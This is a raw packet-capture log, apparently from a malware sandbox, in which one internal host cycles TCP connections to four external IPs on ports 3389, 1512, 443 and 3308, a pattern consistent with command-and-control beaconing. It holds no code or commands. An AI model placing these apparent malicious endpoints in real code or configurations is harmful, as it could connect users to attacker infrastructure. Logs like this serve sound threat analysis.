Jan 12, 2021 01:44:14.311134100 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.315046072 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.315092087 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.368869066 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.369170904 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.408540010 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.422869921 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.422911882 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.513170004 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.513216972 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.513319969 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.516171932 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.518841028 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.572411060 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.626492977 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.679682970 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.679919958 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.709031105 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.762177944 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.768964052 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.769006968 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.769195080 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.875134945 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.929243088 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.929404974 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.939563036 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.939960003 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:14.992985964 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:14.993098021 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:15.030436039 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:15.046209097 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:15.146861076 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:15.146907091 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:15.147090912 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:15.149132013 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:15.202186108 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:15.254313946 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.306612968 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.306823015 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.478774071 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.531084061 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.545794010 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.545903921 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.558043003 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.612680912 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.612857103 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.622970104 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.623262882 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.675354958 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.675579071 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.715337992 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.727613926 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.847279072 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.847323895 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.847485065 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.877931118 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:15.930167913 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:15.983196974 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.026328087 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.026499033 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.038196087 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.081409931 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.092016935 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.092058897 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.092180014 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.105489969 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.150628090 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.150882959 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.158098936 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.158332109 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.201442957 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.201719046 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.241333961 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.245007992 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.245045900 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.357346058 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.357408047 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.357721090 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.359776020 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:16.403073072 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:16.478465080 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:16.532401085 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:16.532491922 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:16.533869982 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:16.587677002 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:16.606197119 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:16.606256962 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:16.606420040 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:16.726666927 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:16.789073944 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:16.789299011 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.689420938 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.689485073 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.743391991 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.743554115 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.783358097 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.797163963 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.797202110 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.888134003 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.888178110 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:17.888411999 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.888468027 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.894000053 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:17.949493885 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:18.016458988 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.069689035 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.069860935 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.071958065 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.125087976 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.131983995 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.132028103 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.132127047 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.132148027 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.158606052 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.213001013 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.213129044 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.222275019 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.222603083 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.275662899 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.275782108 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.314311028 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.328793049 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.429785013 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.429826975 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.430008888 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.435703039 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:18.488806009 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:18.546716928 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.598977089 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.599096060 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.600861073 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.653053999 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.668025017 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.668181896 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.682944059 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.737525940 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.737926006 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.746534109 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.746680021 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.798950911 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.799120903 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.851473093 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.969671011 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.969713926 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:18.970005035 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:18.975873947 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:19.028362989 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:19.093120098 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.136533976 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.136723042 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.138271093 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.181369066 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.192308903 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.192358017 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.192492008 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.208591938 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.253730059 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.254096985 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.269212961 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.269584894 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.312750101 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.312954903 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.352746964 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.356148005 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.356185913 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.468636990 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.468692064 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.468997002 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.474737883 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:19.518039942 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:19.592014074 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.645586967 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.646102905 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.647808075 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.701088905 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.719108105 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.719146967 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.719235897 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.719295979 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.727159977 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.787280083 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.787497997 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.796591043 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.796653986 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.850311041 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.850668907 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.889588118 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.904155016 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.904194117 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.994018078 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.994064093 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:19.994282007 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:19.999913931 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:20.053210974 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:20.127074003 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.180015087 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.180129051 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.181886911 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.234673023 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.241904974 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.241949081 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.242099047 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.257988930 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.312084913 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.312264919 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.322510004 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.322813988 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.375639915 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.375916958 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.414225101 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.428883076 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.428920031 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.529771090 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.529813051 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.529877901 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.529913902 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.535511017 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:20.588507891 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:20.661339045 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.713937998 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:20.714032888 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.715159893 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.767433882 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:20.782258987 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:20.782368898 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.797908068 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.852592945 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:20.852721930 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.862128019 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.862262964 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.914711952 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:20.914993048 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:20.967375994 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:21.085254908 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:21.085299015 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:21.085491896 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:21.091177940 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:21.143537998 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:21.214052916 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.257477045 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.257636070 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.259160995 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.302407980 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.313051939 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.313092947 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.313184977 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.313219070 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.328739882 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.373573065 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.373789072 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.383974075 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.384305954 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.427489996 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.427772045 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.468205929 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.470909119 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.470937014 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.583762884 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.583805084 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.583981037 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.589490891 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:21.632858038 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:21.697695971 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.753492117 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.753623009 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.754980087 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.809112072 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.845258951 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.845314980 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.845393896 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.846035957 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.855431080 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.917020082 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.917298079 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.927553892 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.927598953 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:21.981719017 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:21.981967926 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:22.021701097 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.035880089 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.035922050 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.125299931 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.125341892 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.125518084 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:22.125572920 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:22.131089926 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:22.185771942 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:22.244278908 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.297530890 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.297724009 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.299266100 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.352480888 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.359433889 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.359477043 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.359565973 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.359602928 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.373570919 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.427910089 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.428256035 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.438291073 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.438970089 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.492312908 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.492651939 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.530417919 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.545944929 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.646471977 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.646514893 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.646831036 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.652343035 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:22.705658913 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:22.774024010 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.826399088 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:22.826636076 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.828048944 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.880307913 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:22.895056963 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:22.895200014 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.907238960 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.961721897 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:22.961895943 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.967025042 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:22.967216969 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:23.019342899 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.019498110 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:23.059300900 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.071741104 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.189544916 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.189610958 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.189883947 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:23.195483923 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:23.247700930 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:23.304996014 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.348388910 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.348603010 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.350203037 CET	49208	3308	192.168.2.22	80.86.91.27
